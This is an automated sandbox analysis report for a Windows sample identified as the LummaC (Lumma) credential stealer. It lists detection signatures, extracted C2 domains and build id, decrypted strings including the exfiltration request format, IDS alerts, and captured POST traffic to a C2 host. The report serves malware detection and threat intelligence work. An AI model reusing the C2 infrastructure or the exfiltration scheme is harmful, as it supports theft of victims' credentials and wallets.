Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5Dw2hTQmiB.exe

Overview

General Information

Sample name:5Dw2hTQmiB.exe
renamed because original name is a hash value
Original sample name:017adc7dfb6b77dd2c14f7f7a4933f1c.exe
Analysis ID:1427868
MD5:017adc7dfb6b77dd2c14f7f7a4933f1c
SHA1:1038aa153bfc7e29ffea56b13f24e6f98d7413d2
SHA256:b2f99dd2c6fa0d0321832ac217f6a9842b4b27f3dbfff993547ba2c593573fba
Tags:32exetrojan
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 5Dw2hTQmiB.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\5Dw2hTQmiB.exe" MD5: 017ADC7DFB6B77DD2C14F7F7A4933F1C)
    • WerFault.exe (PID: 4928 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1624 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "exceptionwillapews.shop"], "Build id": "P6Mk0M--key"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1857426384.0000000002FA3000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xde8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Process Memory Space: 5Dw2hTQmiB.exe PID: 6988JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: 5Dw2hTQmiB.exe PID: 6988JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:04/18/24-09:32:11.120979
            SID:2052049
            Source Port:49733
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-09:32:12.067364
            SID:2052049
            Source Port:49734
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-09:32:15.106009
            SID:2052049
            Source Port:49737
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-09:32:09.305940
            SID:2052049
            Source Port:49731
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-09:32:08.210974
            SID:2052048
            Source Port:60512
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-09:32:12.955304
            SID:2052049
            Source Port:49735
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-09:32:13.747309
            SID:2052049
            Source Port:49736
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-09:32:10.239652
            SID:2052049
            Source Port:49732
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-09:32:08.516255
            SID:2052049
            Source Port:49730
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 5Dw2hTQmiB.exeAvira: detected
            Found malware configuration
            Source: 0.2.5Dw2hTQmiB.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "exceptionwillapews.shop"], "Build id": "P6Mk0M--key"}
            Multi AV Scanner detection for domain / URL
            Source: exceptionwillapews.shopVirustotal: Detection: 10%Perma Link
            Source: economicscreateojsu.shopVirustotal: Detection: 13%Perma Link
            Source: exceptionwillapews.shopVirustotal: Detection: 10%Perma Link
            Source: entitlementappwo.shopVirustotal: Detection: 17%Perma Link
            Source: https://exceptionwillapews.shop/Virustotal: Detection: 11%Perma Link
            Source: https://exceptionwillapews.shop/apiVirustotal: Detection: 13%Perma Link
            Source: mealplayerpreceodsju.shopVirustotal: Detection: 18%Perma Link
            Multi AV Scanner detection for submitted file
            Source: 5Dw2hTQmiB.exeVirustotal: Detection: 44%Perma Link
            Source: 5Dw2hTQmiB.exeReversingLabs: Detection: 34%
            Machine Learning detection for sample
            Source: 5Dw2hTQmiB.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: wifeplasterbakewis.shop
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: mealplayerpreceodsju.shop
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: bordersoarmanusjuw.shop
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: suitcaseacanehalk.shop
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: absentconvicsjawun.shop
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: pushjellysingeywus.shop
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: economicscreateojsu.shop
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: entitlementappwo.shop
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: exceptionwillapews.shop
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000003.1643432063.0000000004930000.00000004.00001000.00020000.00000000.sdmpString decryptor: P6Mk0M--key
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_00415B57 CryptUnprotectData,0_2_00415B57

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeUnpacked PE file: 0.2.5Dw2hTQmiB.exe.400000.0.unpack
            Source: 5Dw2hTQmiB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]0_2_00417239
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov edx, dword ptr [esp+00000080h]0_2_004212B0
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi]0_2_00415390
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then inc ebx0_2_00421670
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_0043B800
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]0_2_00435ACB
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]0_2_00409D20
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov edx, dword ptr [esp+0Ch]0_2_0043AE30
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then inc ebx0_2_00414F10
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 18DC7455h0_2_00421F80
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then jmp ecx0_2_0041403B
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then test edi, edi0_2_0043A0D9
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00432140
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+18h]0_2_0041D128
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov edx, dword ptr [esi+000001C0h]0_2_00424240
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00415216
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]0_2_0043822F
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then movsx ecx, byte ptr [esi+eax]0_2_0040D2C0
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov word ptr [eax], dx0_2_0041B2A0
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then xor eax, eax0_2_00439461
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov edx, dword ptr [esp+0Ch]0_2_0043B470
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000F0h]0_2_0041347E
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]0_2_004384D6
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_004025E0
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then jmp ecx0_2_00416582
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then inc ebx0_2_004216CE
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then not ecx0_2_004176E1
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 0AB35B01h0_2_00413722
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000180h]0_2_00411739
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]0_2_0040F7CD
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h0_2_0041B930
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0043799B
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]0_2_00416A62
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]0_2_00417A78
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov byte ptr [edx], al0_2_00422B54
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov byte ptr [edx], al0_2_00422B70
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00417BF5
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi+000008A0h]0_2_0041FBB5
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov dword ptr [esi+00000600h], 00000000h0_2_00410C5B
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_00416E69
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then push edi0_2_0040FED9
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov dword ptr [esi+00000600h], 00000000h0_2_00410F4D
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi+000008A0h]0_2_0041EF19
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then jmp ecx0_2_02EF42A2
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_02F123A7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then test edi, edi0_2_02F1A340
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_02EF70D0
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov edx, dword ptr [esp+0Ch]0_2_02F1B097
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 18DC7455h0_2_02F021E7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov dword ptr [esi+00000600h], 00000000h0_2_02EF11B4
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi+000008A0h]0_2_02EFF180
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then inc ebx0_2_02EF5177
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then push edi0_2_02EF0140
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000F0h]0_2_02EF36E5
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov edx, dword ptr [esp+0Ch]0_2_02F1B6D7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then xor eax, eax0_2_02F196C8
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then jmp ecx0_2_02EF67E9
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]0_2_02F1873D
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]0_2_02EF74A0
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov edx, dword ptr [esi+000001C0h]0_2_02F044A7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov word ptr [eax], dx0_2_02EF547D
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi]0_2_02EF55F7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then movsx ecx, byte ptr [esi+eax]0_2_02EED527
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov edx, dword ptr [esp+00000080h]0_2_02F01517
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov word ptr [eax], dx0_2_02EFB507
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_02F1BA67
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]0_2_02EEFA34
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h0_2_02EFBB97
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_02EE2847
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000180h]0_2_02EF19A0
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 0AB35B01h0_2_02EF3989
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then not ecx0_2_02EF7948
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+18h]0_2_02EFD947
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov dword ptr [esi+00000600h], 00000000h0_2_02EF0EC2
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then inc ebx0_2_02F01E52
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02EF7E5C
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]0_2_02EE9F87
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]0_2_02EF6CC9
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]0_2_02EF7CDF
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov byte ptr [edx], al0_2_02F02DD7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov byte ptr [edx], al0_2_02F02DBB
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]0_2_02F15D32

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2052048 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (exceptionwillapews .shop) 192.168.2.4:60512 -> 1.1.1.1:53
            Source: TrafficSnort IDS: 2052049 ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI) 192.168.2.4:49730 -> 104.21.44.10:443
            Source: TrafficSnort IDS: 2052049 ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI) 192.168.2.4:49731 -> 104.21.44.10:443
            Source: TrafficSnort IDS: 2052049 ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI) 192.168.2.4:49732 -> 104.21.44.10:443
            Source: TrafficSnort IDS: 2052049 ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI) 192.168.2.4:49733 -> 104.21.44.10:443
            Source: TrafficSnort IDS: 2052049 ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI) 192.168.2.4:49734 -> 104.21.44.10:443
            Source: TrafficSnort IDS: 2052049 ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI) 192.168.2.4:49735 -> 104.21.44.10:443
            Source: TrafficSnort IDS: 2052049 ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI) 192.168.2.4:49736 -> 104.21.44.10:443
            Source: TrafficSnort IDS: 2052049 ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI) 192.168.2.4:49737 -> 104.21.44.10:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: wifeplasterbakewis.shop
            Source: Malware configuration extractorURLs: mealplayerpreceodsju.shop
            Source: Malware configuration extractorURLs: bordersoarmanusjuw.shop
            Source: Malware configuration extractorURLs: suitcaseacanehalk.shop
            Source: Malware configuration extractorURLs: absentconvicsjawun.shop
            Source: Malware configuration extractorURLs: pushjellysingeywus.shop
            Source: Malware configuration extractorURLs: economicscreateojsu.shop
            Source: Malware configuration extractorURLs: entitlementappwo.shop
            Source: Malware configuration extractorURLs: exceptionwillapews.shop
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: exceptionwillapews.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: exceptionwillapews.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18161Host: exceptionwillapews.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8782Host: exceptionwillapews.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: exceptionwillapews.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5436Host: exceptionwillapews.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1391Host: exceptionwillapews.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570802Host: exceptionwillapews.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownDNS traffic detected: queries for: exceptionwillapews.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: exceptionwillapews.shop
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682521833.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
